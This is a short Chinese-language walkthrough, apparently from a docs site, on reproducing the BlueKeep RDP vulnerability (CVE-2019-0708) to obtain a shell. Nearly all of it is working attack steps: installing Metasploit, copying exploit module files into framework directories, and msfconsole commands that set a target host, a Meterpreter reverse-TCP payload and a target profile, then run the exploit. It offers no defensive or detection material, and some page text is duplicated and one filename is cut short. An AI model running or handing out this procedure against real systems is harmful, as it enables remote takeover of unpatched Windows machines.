CVE-2019-0708获取shell
今天二狗子一早就叫我去看0708,我就知道这小子复现出东西了。寻声赶紧追上跑远的二狗子
Last updated
Was this helpful?
今天二狗子一早就叫我去看0708,我就知道这小子复现出东西了。寻声赶紧追上跑远的二狗子
Last updated
Was this helpful?
Was this helpful?
0708需要最新的v5框架
apt-get update
apt-get install metasploit-framework
选择相对应的安装目录
rdp.rb放到/usr/share/metasploit-framework/lib/msf/core/exploit 目录
rdp_scanner.rb和cve_2019_0708_bluekeep.rb放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 目录
cve_2019_0708_bluekeep_rce.r放进/usr/share/metasploit-framework/modules/exploits/windows/rdp 目录,这里需要注意如果没有rdp这个目录就去创建个。root@kali:~# msfconsole
msf5 > reload_all # 加载0708exp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > use exploit/windows/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.200.119
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run